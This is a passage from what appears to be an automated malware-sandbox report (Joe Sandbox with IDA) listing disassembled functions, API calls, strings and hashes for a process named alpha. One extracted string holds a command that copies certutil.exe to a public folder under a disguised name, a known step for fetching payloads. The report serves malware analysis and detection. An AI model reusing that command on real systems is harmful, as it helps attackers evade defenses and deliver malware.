                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CC11DF
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                      • String ID:
                                      • API String ID: 611521582-0
                                      • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                      • Instruction ID: 2c281a3b56d7b0a81a2ee9769d386d17df84a74188b3925059ab50db176404af
                                      • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                      • Instruction Fuzzy Hash: AEA1A3BBF0865386EB14AB65E8142BDEBA1FF49F5DF885135CD0E86B44DF3C94458220
                                      Function 00007FF755CA1560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                      • String ID: \\?\
                                      • API String ID: 628682198-4282027825
                                      • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                      • Instruction ID: 52c781ff4e8b4d944cfa872095afbb69f472723333ac3e4be64ec6d73b5e1e1d
                                      • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                      • Instruction Fuzzy Hash: A1E1AFBBA0868396EB61AB20D8502F9A7A0FB44F5DFC85135DA4E867D4EF3CE545C310
                                      Function 00007FF755CCAFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                      • String ID:
                                      • API String ID: 16309207-0
                                      • Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                      • Instruction ID: 82301ffef7fd4107521d267c1c5c8e3753e5127c6dbeeb810274a5398f624165
                                      • Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                      • Instruction Fuzzy Hash: DD22B0BBB04B8386EB64AF60D8542B9A3A0FF45B8CF885135DA1E47B95DF3CE5458310
                                      Function 00007FF755CACE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                      • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                      • API String ID: 3863671652-4137775220
                                      • Opcode ID: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                      • Instruction ID: 78ad319447d94514cd48535676afd331a9b85d58ed1a9bce6f424c472d0d0ee4
                                      • Opcode Fuzzy Hash: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                      • Instruction Fuzzy Hash: 0CE1ADAFE0968386FA61BB14D4543B9ABA0AF45F58FCC4935DA1E462D1DF3CE841C720
                                      Function 00007FF755CA3410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                      • String ID: $Application$System
                                      • API String ID: 3538039442-1881496484
                                      • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                      • Instruction ID: f8def9474cb8d7764a770c5559190ff5544d31217f48bfd86ca278c70707937f
                                      • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                      • Instruction Fuzzy Hash: 7951AFBBA08B8286E760AB15F41067AFAA1FB89F48F899134DE5E43B50DF3CD445C710
                                      Function 00007FF755CCD9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • longjmp.MSVCRT(?,?,00000000,00007FF755CC048E), ref: 00007FF755CCDA58
                                      • memset.MSVCRT ref: 00007FF755CCDAD6
                                      • memset.MSVCRT ref: 00007FF755CCDAFC
                                      • memset.MSVCRT ref: 00007FF755CCDB22
                                        • Part of subcall function 00007FF755CB3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CCEAC5,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CB3A56
                                        • Part of subcall function 00007FF755CA5194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF755CA51C4
                                        • Part of subcall function 00007FF755CB823C: FindFirstFileExW.KERNELBASE ref: 00007FF755CB8280
                                        • Part of subcall function 00007FF755CB823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CB829D
                                        • Part of subcall function 00007FF755CB01B8: _get_osfhandle.MSVCRT ref: 00007FF755CB01C4
                                        • Part of subcall function 00007FF755CB01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB01D6
                                        • Part of subcall function 00007FF755CA4FE8: _get_osfhandle.MSVCRT ref: 00007FF755CA5012
                                        • Part of subcall function 00007FF755CA4FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CA5030
                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CCDDB0
                                        • Part of subcall function 00007FF755CA59E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CA5A2E
                                        • Part of subcall function 00007FF755CA59E4: _open_osfhandle.MSVCRT ref: 00007FF755CA5A4F
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CCDDEB
                                      • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CCDDFA
                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CCE204
                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CCE223
                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CCE242
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                      • String ID: %9d$%s$~
                                      • API String ID: 3651208239-912394897
                                      • Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                      • Instruction ID: 927043449338169684cb2c71ffaf063cfcd9e3a02526d9923669870d168266c4
                                      • Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                      • Instruction Fuzzy Hash: 8742A1BBA0868386EB61BF20D8512FDB7A0FB85B48F981136D65D47A95DF3CE940C710
                                      Function 00007FF755CA372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                      • String ID: COPYCMD$\
                                      • API String ID: 3989487059-1802776761
                                      • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                      • Instruction ID: 7a91b88dea6762752f924eb89addf605d832fac9fb2802f265ad5cacd290dd44
                                      • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                      • Instruction Fuzzy Hash: 8CF1B4ABB0878781EA50BB15D4142BAE7A1FF45F8CF889535CA4E47B94EE3CE445C310
                                      Function 00007FF755CB3140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Time$File$System$FormatInfoLocalLocale
                                      • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                      • API String ID: 55602301-2548490036
                                      • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                      • Instruction ID: 12b7e2f1342f68dbec814eb5a48beebcd3db17deb666763437c86b24525751b7
                                      • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                      • Instruction Fuzzy Hash: D5A1A4BBA1864396EB10AB10E4401BAF7A5FB85F68FD80135DA4E47694EF3CE944C720
                                      Function 00007FF755CD1538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                      • String ID:
                                      • API String ID: 3935429995-0
                                      • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                      • Instruction ID: 87d5fd65d835c389344bd55e9508839c923bcd0dcdcc658c0974e639627d41ef
                                      • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                      • Instruction Fuzzy Hash: F461937BA1869386E790AF22A404679FBA4FF89F58F899135DE4A83790DF3CD4418710
                                      Function 00007FF755CA35B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                      • Instruction ID: bbfa3a3942b03fb88a342381d9f8cac5ce983619bf88901f44ef260712c7268b
                                      • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                      • Instruction Fuzzy Hash: A291E3BBA0868386EB64AF25D8102F9B6A0FB48F4DF885135DA5E46794EF3CD545C320
                                      Function 00007FF755CAB0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _get_osfhandlememset$wcschr
                                      • String ID: DPATH
                                      • API String ID: 3260997497-2010427443
                                      • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                      • Instruction ID: 7a28618f47cd2460a05ca917c9659b960a373131c34f9a463f769bceb2e8d702
                                      • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                      • Instruction Fuzzy Hash: 76D18EBBA0864386EA14AB65D4401BDA6A1FF84FACFC84635DA1D477D5DF3CE841C360
                                      Function 00007FF755CB7FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                      • String ID: @P
                                      • API String ID: 1801357106-3670739982
                                      • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                      • Instruction ID: 9487f712fd1638de1d168626e1fe5d6c134ce2fceb121b487cfa6feac9ed0395
                                      • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                      • Instruction Fuzzy Hash: 53414D77B04A82DAE710AF60E4403EDBBA0FB89B5CF885235DA1D53A88DF78D505C760
                                      Function 00007FF755CA2220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$BufferConsoleInfoScreen
                                      • String ID:
                                      • API String ID: 1034426908-0
                                      • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                      • Instruction ID: 193145b707c10f73b67f6362c5f895428b69949868a30531b33e6f607f9ee92b
                                      • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                      • Instruction Fuzzy Hash: ADF1C2BBA0878389EB64EB21D8402E9ABA4FF45F4CF889530DA5E47695DF3CE544C710
                                      Function 00007FF755CCAC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseValue$CreateDeleteOpen
                                      • String ID: %s=%s$\Shell\Open\Command
                                      • API String ID: 4081037667-3301834661
                                      • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                      • Instruction ID: 22515b58f381023e79289351375e879886f8d9be901fe11f66c215b039c6481d
                                      • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                      • Instruction Fuzzy Hash: 4771F4ABB1978382EB50AB15E8542B9E2A0FF85F98FC85535DE5E07B84DF3CD4418720
                                      Function 00007FF755CCAA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCAA85
                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCAACF
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF755CCAAEC
                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCAB39
                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCAB6F
                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCABA4
                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF755CC98C0), ref: 00007FF755CCABCB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseDeleteValue$CreateOpen
                                      • String ID: %s=%s
                                      • API String ID: 1019019434-1087296587
                                      • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                      • Instruction ID: 06d47f305885bbba12c6486de8bbf13b6ca01b7b141c232c4317ce6e08b46718
